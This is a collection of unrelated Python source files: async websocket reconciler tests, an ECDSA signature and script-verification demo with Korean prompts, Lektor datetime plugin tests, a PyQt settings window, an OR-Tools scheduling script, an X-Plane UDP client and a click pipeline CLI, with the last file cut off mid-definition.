        self.assertEqual(result.keys(), ['error'])
        # The client already received all the messages
        result = yield self.reconciler.get_data(last_received_id=8, next_received_id=None,
                                                topics_rules=[
                                                    ('gim.front.foo', ws.TOPIC_TYPE_EXACT),
                                                    ('gim.front.ba', ws.TOPIC_TYPE_PREFIX),
                                                ], iteration=1)
        self.assertEqual(result, {
            'missed_messages': [],
            'max_msg_id': 8,
            'last_msg_id': 8,
            'iteration': 1.
        })
        # The client needed some messages
        result = yield self.reconciler.get_data(last_received_id=4, next_received_id=None,
                                                topics_rules=[
                                                    ('gim.front.foo', ws.TOPIC_TYPE_EXACT),
                                                    ('gim.front.baz', ws.TOPIC_TYPE_PREFIX),
                                                ], iteration=2)
        self.assertEqual(result, {
            'missed_messages': [
                {'args': [111111], 'kwargs': {'b': 222222,
                    'ws_extra': {'topic': 'gim.front.foo', 'msg_id': 6,
                        'subscribed': [('gim.front.foo', ws.TOPIC_TYPE_EXACT), ]}}},
                {'args': [1111111], 'kwargs': {'b': 2222222,
                    'ws_extra': {'topic': 'gim.front.baz', 'msg_id': 7,
                        'subscribed': [('gim.front.baz', ws.TOPIC_TYPE_PREFIX), ]}}},
                {'args': [11111111], 'kwargs': {'b': 22222222,
                    'ws_extra': {'topic': 'gim.front.baz2', 'msg_id': 8,
                        'subscribed': [('gim.front.baz', ws.TOPIC_TYPE_PREFIX), ]}}},
            ],
            'max_msg_id': 8,  # max in `missed_messages`, also the last at fetch time
            'last_msg_id': 8,
            'iteration': 2.
        })
        result = yield self.reconciler.get_data(last_received_id=4, next_received_id=None,
                                                topics_rules=[
                                                    ('gim.front.foo', ws.TOPIC_TYPE_EXACT),
                                                ], iteration=1)
        self.assertEqual(result, {
            'missed_messages': [
                {'args': [111111], 'kwargs': {'b': 222222,
                    'ws_extra': {'topic': 'gim.front.foo', 'msg_id': 6,
                        'subscribed': [('gim.front.foo', ws.TOPIC_TYPE_EXACT), ]}}},
            ],
            'max_msg_id': 8,  # the last at fetch time
            'last_msg_id': 8,
            'iteration': 1.
        })
        # We shouldn't have a lock on iteration < 5
        with patch.object(self.publisher, 'lock_publishing', autospec=True) as locked:
            result = yield self.reconciler.get_data(last_received_id=4, next_received_id=8,
                                                    topics_rules=[
                                                        ('gim.front.foo', ws.TOPIC_TYPE_EXACT),
                                                        ('gim.front.baz', ws.TOPIC_TYPE_PREFIX),
                                                    ], iteration=1)
            self.assertEqual(locked.call_count, 0)
            self.assertEqual(result, {
                'missed_messages': [
                    {'args': [111111], 'kwargs': {'b': 222222,
                        'ws_extra': {'topic': 'gim.front.foo', 'msg_id': 6,
                            'subscribed': [('gim.front.foo', ws.TOPIC_TYPE_EXACT), ]}}},
                    {'args': [1111111], 'kwargs': {'b': 2222222,
                        'ws_extra': {'topic': 'gim.front.baz', 'msg_id': 7,
                            'subscribed': [('gim.front.baz', ws.TOPIC_TYPE_PREFIX), ]}}},
                ],
                'max_msg_id': 8,  # `next_received_id`, also the last at fetch time
                'last_msg_id': 8,
                'iteration': 1.
            })
        # We should have a lock on iteration 5
        with patch.object(self.publisher, 'lock_publishing', autospec=True) as locked:
            result = yield self.reconciler.get_data(last_received_id=4, next_received_id=7,
                                                    topics_rules=[
                                                        ('gim.front.foo', ws.TOPIC_TYPE_EXACT),
                                                        ('gim.front.baz', ws.TOPIC_TYPE_PREFIX),
                                                    ], iteration=5)
            locked.assert_called_once_with()
            self.assertEqual(result, {
                'missed_messages': [
                    {'args': [111111], 'kwargs': {'b': 222222,
                        'ws_extra': {'topic': 'gim.front.foo', 'msg_id': 6,
                            'subscribed': [('gim.front.foo', ws.TOPIC_TYPE_EXACT), ]}}},
                ],
                'max_msg_id': 8,  # the last at fetch time
                'last_msg_id': 8,
                'iteration': 5.
            })
|
# -*- coding: utf-8 -*-
import ECDSA
import ExtendedStack as st
import sys
# 남은 횟수 없을 시 종료
def error_check(cnt):
    """Terminate the program when no retry attempts remain.

    Args:
        cnt: remaining attempt count; the process exits when it is <= 0.
    """
    # sys.exit() raises SystemExit, so nothing runs past this point when the
    # counter is exhausted; the redundant `else: return` was dropped.
    if cnt <= 0:
        sys.exit()
def hashing(pubkey):
    """Return hex digests of both public-key coordinates (Qx, Qy).

    Each coordinate is serialized as a 32-byte big-endian integer, hashed
    with ECDSA.Hashing, and rendered as a lowercase hex string.
    """
    digests = []
    for coord in (pubkey[0], pubkey[1]):
        raw = ECDSA.Hashing(coord.to_bytes(32, 'big'))
        digests.append(''.join(format(byte, '02x') for byte in raw))
    return digests[0], digests[1]
# Interactive demo: sign a message, then verify it with a Bitcoin-style
# stack-machine script interpreter supplied by the ExtendedStack module.
print("=========================================")
print("메시지를 입력하세요.")
msg = input()
print('\n')
print("키를 생성합니다.\n")
privateKey, publicKey = ECDSA.make_key()
print("서명을 생성합니다.\n")
signature = ECDSA.make_signature(msg, privateKey)
print("생성된 메시지, 키, 서명은 다음과 같습니다.\n")
print("메시지 : ", msg)
print("\n")
print("개인키 : ", hex(privateKey))
print("\n")
print("공개키 : Qx, Qy")
print("Qx : ", hex(publicKey[0]))
print("Qy : ", hex(publicKey[1]))
print("\n")
print("서명 : r, s")
print("r : ", hex(signature[0][0]))
print("s : ", hex(signature[0][1]))
print("\n")
print("공개키의 해시 값 : LSH(Qx), LSH(Qy)")
hx, hy = hashing(publicKey)
print("LSH(Qx) : ", '0x' + hx)
print("LSH(Qy) : ", '0x' + hy)
print("=========================================")
# Initialise the script interpreter: empty stack plus an attempt counter.
stack, cnt = st.init()
print("모드를 입력하세요.")
print("생성된 서명과 공개키로 서명 검증 확인 (검증 성공) : 1")
print("임의의 공개키에 대한 해시값 생성 (검증 실패) : 2")
print("임의의 공개키를 생성 (검증 실패) : 3")
print("임의의 서명 생성 (검증 실패) : 4")
print("직접 입력 (올바른 입력 시 검증 성공) : 5")
mode = int(input("mode : "))
# NOTE(review): this only re-prompts once; a second invalid entry is
# accepted unchecked.
if mode not in [1, 2, 3, 4, 5]:
    print("다시 입력하세요.")
    mode = int(input("mode : "))
while True:
    # The ECDSA module produces two valid signatures, (r, s) and (r, -s);
    # signature[0] selects the (r, s) form.
    scripts, scriptPubKey, scriptSig, cnt = st.make_script(cnt, signature[0], publicKey, msg, mode)
    scripts, cnt, valid = st.scripts_to_queue(scripts, cnt)
    if cnt <= 0 or valid == True:
        break
error_check(cnt)
print("=========================================")
print("scriptPubKey : ", end = "")
for scr in scriptPubKey:
    print(scr, end = " ")
print('\n')
print("scriptSig : ", end = "")
for scr in scriptSig:
    print(scr, end=" ")
print('\n')
print("=========================================")
print('\n')
# Execute the combined script one opcode at a time until it is exhausted
# or an operation reports failure.
while scripts.empty() == False:
    stack, valid = st.oper(stack, msg, scripts)
    if valid == False:
        break
error_check(cnt)
print('\n')
print("=========================================")
print("최종 결과")
# Verification succeeds only if exactly "True" remains on the stack.
if len(stack) == 1 and stack[0] == "True":
    print("서명 검증에 성공하였습니다.")
    print("UnLocking Success")
else:
    print("서명 검증에 실패하였습니다.")
    print("UnLocking Fail")
st.print_stack(stack)
input("엔터를 누르면 종료합니다.")
a = 'oM sai rAm'
print(a.title())
print(a.lower())
print(a.capitalize())

# usecase4: list the uppercase characters of a string
test_str = "PyThoN"
print("The original string is : " + str(test_str))
# str.isupper() is True only for uppercase letters, so digits and
# punctuation are skipped automatically.
res = [char for char in test_str if char.isupper()]
# Fix: `res` is already a list; the extra `a = list(res)` copy was redundant
# (and silently rebound `a` from the string above to a list).
for i in res:
    print("The uppercase characters in string are : " + i)
|
from datetime import date, datetime, timezone
from jinja2 import Undefined
# This is a workaround for lektor/lektor#974 in lektor==3.3
from lektor import environment # noqa: F401
from lektor import types
import pytest
@pytest.fixture
def env():
    """Provide a fresh DummyEnv instance for each test."""
    dummy_env = DummyEnv()
    return dummy_env
def raw_value(value):
    """Wrap *value* in a lektor RawValue named 'test' (no field, no pad)."""
    return types.RawValue('test', value, None, None)
class TestComparableDate(object):
    """Tests for comparable_date: a date comparable against datetimes/None."""

    def make_one(self, year=1970, month=1, day=1):
        # Imported lazily so collection does not require the plugin.
        from lektor_datetime_helpers import comparable_date
        return comparable_date(year, month, day)

    def test_compare_to_date(self):
        left = self.make_one(1970, 1, 2)
        assert left == date(1970, 1, 2)

    def test_compare_to_naive_datetime(self):
        # A date sorts before any time-of-day on the same day.
        left = self.make_one(1970, 1, 2)
        assert left < datetime(1970, 1, 2)
        assert left > datetime(1970, 1, 1, 23, 59, 59)

    def test_compare_to_tzaware_datetime(self):
        left = self.make_one(1970, 1, 2)
        assert left < datetime(1970, 1, 2, tzinfo=timezone.utc)
        assert left > datetime(1970, 1, 1, 23, 59, 59, tzinfo=timezone.utc)

    def test_compare_to_integer(self):
        # Non-date operands must still raise, matching plain date semantics.
        left = self.make_one(1970, 1, 2)
        with pytest.raises(TypeError):
            left < 0 # noqa: B015

    def test_compare_to_none(self):
        # Even the minimum representable date sorts after None.
        left = self.make_one(date.min.year, date.min.month, date.min.day)
        assert left > None

    def test_hash(self):
        dt = self.make_one()
        assert isinstance(hash(dt), int)
class TestComparableDatetime(object):
    """Tests for comparable_datetime: a datetime comparable against dates/None."""

    def make_one(self, year=1970, month=1, day=1,
                 hour=0, minute=0, second=0, tzinfo=None):
        # Imported lazily so collection does not require the plugin.
        from lektor_datetime_helpers import comparable_datetime
        return comparable_datetime(year, month, day,
                                   hour, minute, second, tzinfo=tzinfo)

    def test_compare_to_date(self):
        # Midnight of a day sorts after the bare date and before the next day.
        left = self.make_one(1970, 1, 2)
        assert left > date(1970, 1, 2)
        assert left < date(1970, 1, 3)

    def test_compare_to_naive_datetime(self):
        left = self.make_one(1970, 1, 2)
        assert left == datetime(1970, 1, 2)

    def test_compare_to_tzaware_datetime(self):
        # Naive vs aware must still order without raising.
        left = self.make_one(1970, 1, 2)
        assert left < datetime(1970, 1, 2, tzinfo=timezone.utc)

    def test_compare_to_integer(self):
        left = self.make_one(1970, 1, 2)
        with pytest.raises(TypeError):
            left < 0 # noqa: B015

    def test_compare_to_none(self):
        # Even the minimum representable datetime sorts after None.
        left = self.make_one(
            datetime.min.year, datetime.min.month, datetime.min.day,
            datetime.min.hour, datetime.min.minute, datetime.min.second)
        assert left > None

    def test_hash(self):
        dt = self.make_one()
        assert isinstance(hash(dt), int)
class TestDateOrDateTimeType(object):
    """Tests for the DateOrDateTimeType lektor field type."""

    @pytest.fixture
    def type_(self, env):
        from lektor_datetime_helpers import DateOrDateTimeType
        options = None
        return DateOrDateTimeType(env, options)

    def test_missing(self, type_):
        # Missing raw value yields Undefined, not a BadValue error marker.
        value = type_.value_from_raw(raw_value(None))
        assert isinstance(value, Undefined)
        assert not isinstance(value, types.BadValue)

    def test_date(self, type_):
        value = type_.value_from_raw(raw_value('2017-04-01'))
        assert isinstance(value, date)

    def test_datetime(self, type_):
        # A value with a time component parses to a datetime instead.
        value = type_.value_from_raw(raw_value('2017-04-01 12:04'))
        assert isinstance(value, datetime)

    def test_bad_value(self, type_):
        value = type_.value_from_raw(raw_value('Not a date'))
        assert isinstance(value, types.BadValue)
class TestPlugin(object):
    """Tests for DatetimeHelpersPlugin's localization and formatting helpers."""

    @pytest.fixture
    def plugin(self, env):
        from lektor_datetime_helpers import DatetimeHelpersPlugin
        id_ = 'test-plugin'
        return DatetimeHelpersPlugin(env, id_)

    def test_localize_aware_datetime(self, plugin):
        # Already tz-aware values are passed through unchanged (same object).
        dt = datetime(2017, 4, 1, 12, 34, tzinfo=timezone.utc)
        localized = plugin.localize_datetime(dt)
        assert localized is dt

    def test_localize_naive_datetime(self, plugin):
        plugin.on_setup_env()
        dt = datetime(2017, 4, 1, 12, 34)
        localized = plugin.localize_datetime(dt)
        # Naive input is converted to the local timezone (new object).
        assert localized is not dt
        assert localized == dt.astimezone()

    def test_isoformat(self, plugin):
        dt = date(2017, 4, 1)
        assert plugin.isoformat(dt) == '2017-04-01'
class DummyEnv(object):
    """Minimal stand-in for a lektor Environment used by the fixtures."""

    def __init__(self):
        self.jinja_env = DummyJinjaEnv()
        self.types = set()

    def add_type(self, type_):
        """Record *type_* as registered with this environment."""
        self.types.add(type_)
class DummyJinjaEnv(object):
    """Minimal stand-in for a Jinja environment: just a filters mapping."""

    def __init__(self):
        self.filters = dict()
|
from ._title import Title
from plotly.graph_objs.layout.scene.zaxis import title
from ._tickformatstop import Tickformatstop
from ._tickfont import Tickfont
|
import PyQt5.QtCore as qc
import PyQt5.QtWidgets as qw
from game import Game
class UI(qw.QWidget):
    """Settings window: sliders for window size / object count, launches Game."""
    # Class-level defaults; default() overwrites them right after construction.
    objectCount = 1
    gravitation_modifier = 1
    timeInterval = 100
    windowWidth = 500
    windowHeight = 500
    widthSlider = None
    heightSlider = None
    game = None
    gridLayout = None

    def __init__(self):
        super().__init__()
        self.setWindowTitle("Settings")
        self.initUiElements()
        self.default()

    def default(self):
        """Reset all settings and push them into the sliders."""
        self.objectCount = 3
        self.gravitation_modifier = 1
        self.timeInterval = 100
        self.windowWidth = 500
        self.windowHeight = 500
        # setValue() fires valueChanged, which re-runs the setters below.
        self.widthSlider.setValue(self.windowWidth)
        self.heightSlider.setValue(self.windowHeight)
        self.objectCountSlider.setValue(self.objectCount)

    def initUiElements(self):
        """Build sliders, buttons and the 3-column grid layout."""
        widthSlider = qw.QSlider(qc.Qt.Horizontal)
        widthSlider.setMinimum(100)
        widthSlider.setMaximum(1000)
        widthSlider.valueChanged.connect(self.setWindowWidth)
        widthSlider.setToolTip("Set horizontal size")
        self.widthSlider = widthSlider
        heightSlider = qw.QSlider(qc.Qt.Horizontal)
        heightSlider.setMinimum(100)
        heightSlider.setMaximum(1000)
        heightSlider.valueChanged.connect(self.setWindowHeight)
        heightSlider.setToolTip("Set vertical size")
        self.heightSlider = heightSlider
        objectCountSlider = qw.QSlider(qc.Qt.Horizontal)
        objectCountSlider.setMinimum(1)
        objectCountSlider.setMaximum(5)
        objectCountSlider.valueChanged.connect(self.setObjectCount)
        objectCountSlider.setToolTip("Set number of objects")
        self.objectCountSlider = objectCountSlider
        self.startGameButton = qw.QPushButton("Start")
        self.startGameButton.setToolTip("Start the game")
        self.startGameButton.clicked.connect(self.startGame)
        self.resetButton = qw.QPushButton("Reset settings")
        self.resetButton.clicked.connect(self.default)
        self.gridLayout = qw.QGridLayout(self)
        row = 0
        def addToLayout(name, element):
            # Each row is (name label, widget, empty value label);
            # updateValueText() relies on exactly this ordering.
            nonlocal row
            self.gridLayout.addWidget(qw.QLabel(name), row, 0)
            self.gridLayout.addWidget(element, row, 1)
            self.gridLayout.addWidget(qw.QLabel(), row, 2)
            row += 1
        addToLayout("Width", widthSlider)
        addToLayout("Height", heightSlider)
        addToLayout("Anzahl Objekte", objectCountSlider)
        self.gridLayout.addWidget(self.startGameButton, row, 0, 1, 3)
        self.gridLayout.addWidget(self.resetButton, row + 1, 0, 1, 3)

    def updateValueText(self, slider, postfix=""):
        """Show the slider's value in the label placed right after it."""
        # itemAt(indexOf(slider) + 1) is the trailing QLabel added by
        # addToLayout for the same row.
        index = self.gridLayout.indexOf(slider)
        label = self.gridLayout.itemAt(index + 1).widget()
        label.setText(str(slider.value()) + postfix)

    def setWindowWidth(self, value):
        self.windowWidth = value
        self.updateValueText(self.widthSlider, "px")

    def setWindowHeight(self, value):
        self.windowHeight = value
        self.updateValueText(self.heightSlider, "px")

    def setObjectCount(self, value):
        self.objectCount = value
        self.updateValueText(self.objectCountSlider, " Objekt/e")

    def startGame(self):
        """Open the Game window and hide the settings until it closes."""
        # NOTE(review): this passes the slider widget itself, not
        # self.objectCount -- confirm Game's expected second argument.
        self.game = Game(self, self.objectCountSlider)
        self.game.show()
        self.game.closeEvent = self.gameClosed
        self.hide()

    def gameClosed(self, _):
        # Stop the game's timer before showing the settings again.
        self.game.timer.stop()
        self.show()
|
#! /usr/bin/env python
# Processing Order with deadlines
from ortools.constraint_solver import pywrapcp
import pudb
import matplotlib.pyplot as plt
# pudb.set_trace()
def main():
    """Greedy back-to-front scheduling of orders with deadlines.

    Each order is first scheduled to finish exactly at its deadline
    (latest deadline first); the slots are then shifted left so they
    abut, with the earliest slot starting at t=0.
    """
    # ----- Problem data -----
    num_orders = 4
    num_products = 3
    all_products = range(0, num_products)
    all_orders = range(0, num_orders)
    orders = [[0, 1, 2],
              [0, 1],
              [1, 2],
              [0, 2]
              ]
    processing_times = [[5, 2, 3],
                        [3, 4, 5],
                        [2, 5],
                        [2, 1]
                        ]
    deadlines = [15, 45, 30, 35]
    # Total processing time per order (sum over its product tasks).
    required_times = [sum(i) for i in processing_times]
    # Horizon: no task may end after the latest deadline.
    horizon = max(deadlines)
    solver = pywrapcp.Solver("ProcessOrder")
    # Interval variables task(i, j): j-th product task of order i.
    # NOTE(review): the CP solver and these intervals are built but never
    # solved below -- the actual schedule comes from the greedy pass.
    all_tasks = {}
    for i in all_orders:
        for j in range(len(orders[i])):
            all_tasks[(i, j)] = solver.FixedDurationIntervalVar(0,
                                                                deadlines[i],
                                                                processing_times[i][j],
                                                                False,
                                                                'Order_%i_Product_%i' % (i, j)
                                                                )
    print("Problem Information".center(60, '*'))
    print("ProductTypes: ", [_ for _ in all_products])
    print("Total Orders: ", len(orders))
    for i, order in enumerate(orders):
        print('Order %i -- %s'%(i, order))
    print(" Processing Times ".center(40, '='))
    for i, time in enumerate(required_times):
        print('Order %i -- %i'%(i, time))
    print(" Deadlines ".center(40, '='))
    for i, deadline in enumerate(deadlines):
        print('Order %i -- %i'%(i, deadline))
    print("Solution".center(60, '*'))
    # ----- Greedy pass -----
    # Fix: the original recovered the order index with deadlines.index(max),
    # which always returns the FIRST order having that deadline, so duplicate
    # deadlines would mis-attribute slots. Carrying the index along avoids it.
    slots_latest_first = sorted(
        ((deadlines[i], required_times[i], i) for i in all_orders),
        reverse=True)  # latest deadline first
    totalTimeSlots = []
    for deadline, requiredTime, orderIndex in slots_latest_first:
        totalTimeSlots.append({
            "start": deadline - requiredTime,  # finish exactly at the deadline
            "end": deadline,
            "orderIndex": orderIndex,
        })
    # Order the slots by start time, then shift each one left so slot i
    # starts when slot i-1 ends (the first slot is shifted to start at 0).
    ordered_list = sorted(totalTimeSlots, key=lambda k: k['start'])
    for i, order in enumerate(ordered_list):
        if i == 0:
            shift = ordered_list[i]['start'] - 0
        else:
            shift = ordered_list[i]['start'] - ordered_list[i - 1]['end']
        order['start'] -= shift
        order['end'] -= shift
    print("Optimized List")
    for order in ordered_list:
        print("Order %i - (%i, %i) " % (order['orderIndex'], order['start'],
                                        order['end']))
|
#!/usr/bin/env python
# ----------------------------------------------------------
# XPlane Connect for F16Glass
# ----------------------------------------------------------
# This module handels and stores all aircraft data, and communicated via FSUIPC to FS2004
#
#
# ---------------------------------------------------------------
import threading
import time
import logging
import struct
import config
#from socket import *
import socket
#Constants
#DataTypes
INT32 = 1
INT64 = 2
FLOAT32 = 3
FLOAT64 = 4
STRING8 = 5
STRING32 = 6
STRING64 = 7
STRING128 = 8
STRING256 = 9
#Header length
HEADER_len = 12
#class data_obj(object):
#Used to make a object for Definition to link to
# def __init__(self, value, pack_s):
# self.value = value
# self.adjusted = value #Used incase value needs to be adjusted from data inputed from FSX.
# self.pack_s = pack_s
class empty_event(object):
    """Null-object event: send() does nothing but log the call."""

    def send(self):
        # Nothing is wired to this event yet; just note that it was invoked.
        logging.debug("Pass, no function associated with this event to do.")
class event_obj(object):
    """Holds a send event together with the value it will transmit."""

    def __init__(self, value):
        self.value = value
        # Defaults to 0; later set to this object's index in the event list.
        self.event_id = 0
        # Placeholder null-object until a real event is attached.
        self.event = empty_event()
class XPlaneUDP_Client_c(threading.Thread):
    """UDP client thread talking to X-Plane (Python 2 code).

    Owns the socket, an incoming read buffer, and a list of decoded
    packets. Most of the original frame-decoding logic is commented out
    and preserved for reference.
    """

    def __init__(self, recieve):
        self.clock = time.time()
        self.count = 0
        self.kill_timer = 0
        threading.Thread.__init__(self)
        self.started = False
        self.read_buffer = ''
        self.packet_data = []
        self.go = True
        # Note: attribute name keeps the original (misspelled) spelling,
        # since external code reads it.
        self.recieve = recieve

    def reset(self):
        """Clear counters and buffered data."""
        self.count = 0
        self.kill_timer = 0
        self.read_buffer = ''
        self.packet_data=[]

    def send(self, data):
        """Send one UDP datagram to the stored server address."""
        #Send to server UDP
        self.s.sendto(data, self.addr)
        logging.debug("UDP OUT: %s %r", data, self.addr)

    def start_client(self):
        """Start the receive thread exactly once."""
        if self.started==False:
            logging.info("XPlaneConnect: Starting Thread")
            self.start()
            self.started=True

    def connect(self, addr, port):
        """Create the UDP socket and announce ourselves to X-Plane."""
        #Attempts to connect to XPLANE.
        self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        #self.s.settimeout(config.timeout)
        #self.s.connect((addr, port))
        #self.s.setblocking(0)
        self.addr = (addr,port)
        #Send connection header
        #self.s.settimeout(None)
        # 2 s receive timeout keeps run() responsive to self.go.
        self.s.settimeout(2)
        #self.s.setblocking(0)
        logging.info("XPlane Connect: Sending Connect string")
        self.send('CONNECT') #The initial connect attempt to XPLANE
        self.connected=True

    def close(self):
        """Stop the receive loop and close the socket if it was opened."""
        self.go = False
        if hasattr(self, 's'):
            self.s.close()

    def run(self):
        """Receive loop: read datagrams into self.read_buffer until stopped."""
        def reset_timer():
            #used to reset the kill timer.
            #Called from RJGlass to reset timer, if timer isn't reset then thread will die.
            self.kill_timer = 0
        def decode_data(length, packet_type):
            #Used to look for and read anydata that is coming in.
            #Take data from buffer minus header
            data = self.read_buffer[12:length]
            self.read_buffer = self.read_buffer[length:]
            #print "%r" %data
            self.packet_data.append([packet_type, data])
            #print "PD", self.packet_data
            return len(self.packet_data)
            #print self.packet_data
        #Begin self.receive()
        self.go = True
        logging.info("XPlaneConnect: Server Starting")
        while self.go:
            #print "SERVER LOOP"
            #print time.time()-self.clock
            #try:
            if self.recieve:
                try:
                    r, addr2 = self.s.recvfrom(1024)
                    logging.debug("UDP RECV (%d) %r ", len(r), r)
                except socket.timeout:
                    # Timeout just yields an empty read; the loop continues.
                    r = ''
                    logging.debug("UDP RECV Timedout")
                except socket.error,e:
                    #logging.warning("UDP Error %r", e)
                    self.connected = False
                    r = ""
            else:
                r = ''
            #r =self.s.recv(1024)
            #print "%r" %r
            #self.read_buffer = self.read_buffer + r
            # Each datagram REPLACES the buffer (no cross-datagram assembly).
            self.read_buffer = r
            logging.debug("Recived Buffer (%d) %r", len(r), r)
            #except:
            #    pass
            #self.kill_timer += 1 #This is used to kill thread, if RJGlass crashes, or locks up.
            #if self.kill_timer>200:
            #    self.go = False
            #    print "Error: No Data to Recieve"
            #l = len(self.read_buffer)
            #while l>=12: #If not atleast 12bytes than no buffer.
            #    out = decode_header(self.read_buffer)
            #    if out[1]== self.protocol: #Check to see if protocol is correct
            #        status = True #Used in return value
            #print "Header ", out
            #        if l>=out[0]: #Make sure buffer is large enough for entire data
            #            num = decode_data(out[0], out[2]) #The length and type is send to decode data
            #print time.time(), "Packet" , out[0]
            #            l = len(self.read_buffer)
            #            if num > 130: #If data is not being read then close thread.
            #This is so the thread wont run forever.
            #                self.go = False
            #                print "RJGlass is not reading input buffer, exiting client thread."
            #If data is decoded it will be sent to self.packet_data list.
            #print time.time()-self.clock, out[0], out[2]
            #        else:
            #            print self.app_name, "Error: Length not correct" , l, out[0]
            #            l=0 #bad data forces while loop to exit
            #    else: #If protocol wrong then error in transmission clear buffer
            #self.read_buffer = ''
            #        l=0 #forces loop to exit
            #        print self.app_name, "Error in Data: Protocol Wrong, Read_Buffer cleared" , out[1]
            #print time.time(), "PD < 12"
            #Check read buffer
            #print "%r" %self.read_buffer
            #print "Break"
            #time.sleep(3)
        #Quit thread
        self.s.close()
class XPdata_obj(object):
    """Pairs a data variable with an optional conversion callback."""

    def __init__(self, var, func=None):
        self.var, self.func = var, func
class outdata_c(object):
    """One group of outdata (values sent from XPlane to GlassServer).

    Accumulates a single struct format string covering every variable
    added to the group, plus its packed byte size.
    """

    def __init__(self):
        self.list = []           # XPdata_obj entries, in pack order
        self.outpack_s = ''      # concatenated struct format string
        self.outpack_size = 0    # byte size of the packed group

    def add(self, addr, data_s, obj, func):
        """Append one variable to the group (*addr* is currently unused)."""
        self.list.append(XPdata_obj(obj, func))
        self.outpack_s = self.outpack_s + data_s
        self.outpack_size = struct.calcsize(self.outpack_s)
class XPlaneUDP(object):
    """Facade around the UDP client: data registration, send and receive.

    Python 2 code. Outgoing values live in indata_list/inpack_list; incoming
    values are grouped into high/low-priority outdata_c groups.
    """

    def __init__(self, recieve):
        #Initalizes SimConnect
        #Depending on your FSX_version you are connecting to, need to set protocol etc.
        #self.read_buffer = ''
        #Set outdata as two groups High Priority, Low Priority
        self.HP_outdata = outdata_c()
        self.LP_outdata = outdata_c()
        #self.outdata = [self.HP_oudata, self.LP_outdata]
        self.connected = False
        #self.aircraft = aircraft
        self.indata_list = []
        self.inpack_list = []
        self.client = XPlaneUDP_Client_c(recieve)
        self.data_list = [] #Sets up data list will be object eventually

    def connect(self, addr, port, connect):
        """Open the UDP socket; optionally start the receive thread."""
        self.client.connect(addr,port)
        if connect: self.client.start_client()
        self.connected = True

    def close(self):
        #Closes the connection with XPlane
        self.client.close()

    def send_data(self):
        """Pack every registered in-variable and send one datagram."""
        out_s = ''
        index = 0
        for item in self.indata_list:
            out_s += struct.pack(self.inpack_list[index],item.value)
            index += 1
        self.client.send(out_s)
        logging.debug("XPlaneConnect: Client Out %r", out_s)

    def receive(self):
        """Decode one buffered datagram into the LP outdata group.

        Returns True when a full-size packet was decoded, else False.
        """
        def unpack_data(outdata,data):
            # First byte is the packet id; the rest matches outpack_s.
            out = struct.unpack(outdata.outpack_s, data[1:])
            #print out
            count = 0
            #print out
            for item in outdata.list:
                #print count, out[count]
                #Possible functio here?
                item.var.client_set(out[count])
                count += 1
        def decode_data(data):
            id = struct.unpack('c', data[0])
            logging.debug("XPlaneConnect: ID %s received", id[0])
            if id[0] == '1': #High Priority outdata
                #Main Data struct
                # NOTE(review): id '1' is labelled high priority but is
                # decoded into LP_outdata -- confirm which group is intended.
                unpack_data(self.LP_outdata, data)
            elif id[0] == '2':
                #print "ID 2"
                pass
        status = False #Check packet data to see if any data is in there.
        logging.debug("XPlaneConnect : Readbuffer %d %r", len(self.client.read_buffer), self.client.read_buffer)
        #print self.LP_outdata.outpack_size
        # Only decode an exact-size packet: 1 id byte + packed payload.
        if len(self.client.read_buffer) == self.LP_outdata.outpack_size + 1:
            #print "Decoding Packet", len(self.client.packet_data)
            #print len(self.client.read_buffer), "%r" %self.client.read_buffer
            status = True
            decode_data(self.client.read_buffer)
            #print "R BUFFER %r " %self.client.read_buffer
            self.client.read_buffer = ''
        else:
            pass #print "WRONG SIZE", len(self.client.read_buffer)
        #define_id.append(decode_packet(self.client.packet_data.pop(0)))
        return status

    def output(self):
        """Drain and log any packets the client thread has queued."""
        while len(self.client.packet_data) >0:
            i = self.client.packet_data.pop(0)
            logging.debug("XPlaneConnect: Packet Recv : %d %r", len(i[1]),i)

    def indata_add(self, addr, data_s, obj):
        """Register an outgoing variable and its struct format (*addr* unused)."""
        self.indata_list.append(obj)
        self.inpack_list.append(data_s) #Overall pack string
        #self.inpack_size = struct.calcsize(self.inpack_s)
if __name__ == '__main__':
    # Manual test harness against a live X-Plane host.
    # NOTE(review): `data_obj`, `mapClientDatatoID`, `create_ClientDataDefinition`,
    # `create_DataDefinition` and `requestAIData` are NOT defined in this module
    # as shown (the data_obj class above is commented out), so this demo raises
    # NameError/AttributeError as-is -- it appears copied from a SimConnect demo.
    s = XPlaneUDP(True)
    s.connect('192.168.1.40', 1500, True)
    s.receive()
    #s.Load_Flightplan('DTWCVG')
    clientID = 2
    defineID = 5
    alt = data_obj(200.0)
    ias = data_obj(200.0)
    s.mapClientDatatoID("TestCDataArea2", clientID)
    s.definition_0 = s.create_ClientDataDefinition(defineID)
    s.def1 = s.create_DataDefinition(3)
    s.def1.add("Indicated Altitude", "feet", FLOAT32, alt)
    s.def1.add("Airspeed Indicated", "knots", FLOAT32, ias)
    airspeed = data_obj(0)
    #s.definition_0.add('Airspeed',FLOAT64, airspeed)
    #s.definition_0.add('Airspeed',FLOAT64, alt)
    #s.definition_0.add('Airspeed',FLOAT64, ias)
    s.output()
    #Loop
    f = 22.26
    i = 3
    for i in range(10):
        #s.definition_0.request(clientID, 2, ClientDataDefinition.ONCE)
        #s.def1.request(3,DataDefinition.USER, DataDefinition.ONCE, interval = 0)
        s.requestAIData(3, 5000, 2)
        #s.sendClientData(2,5, struct.pack('<ddd', i,f,f))
        #i+=1
        #f+=1.4
        #print airspeed.value
        #s.receive()
        #alt = data_obj(200.0)
        #s.definition_0.add("Indicated Altitude", "feet", FLOAT32, alt)
        #AGL = alt.get
        time.sleep(2)
        #s.output()
        s.receive()
    #print s.def1.AI_data
    #s.definition_0.request(4, DataDefinition.USER, DataDefinition.VISUAL_FRAME, interval = 10)
    #while True:
    time.sleep(13)
    s.close()
|
import click
# see : http://click.pocoo.org/6/commands/#multi-command-pipelines
@click.group(chain=True, invoke_without_command=True)
@click.option('-i', '--input', type=click.File('r'))
def cli(input):
    """Pipeline entry point; each chained subcommand returns a processor."""
    pass
# NOTE(review): resultcallback() was renamed result_callback() in click 8 --
# confirm the pinned click version.
@cli.resultcallback()
def process_pipeline(processors, input):
    """Feed input lines through each subcommand's processor, then echo."""
    # NOTE(review): `input` is None when -i is omitted; iterating it would
    # raise TypeError -- confirm the option is effectively required.
    iterator = (x.rstrip('\r\n') for x in input)
    for processor in processors:
        iterator = processor(iterator)  # lazily chain the generators
    for item in iterator:
        click.echo(item)
@cli.command('uppercase')
def make_uppercase():
    """Return a processor that upper-cases every line."""
    def processor(iterator):
        return (line.upper() for line in iterator)
    return processor
@cli.command('lowercase')
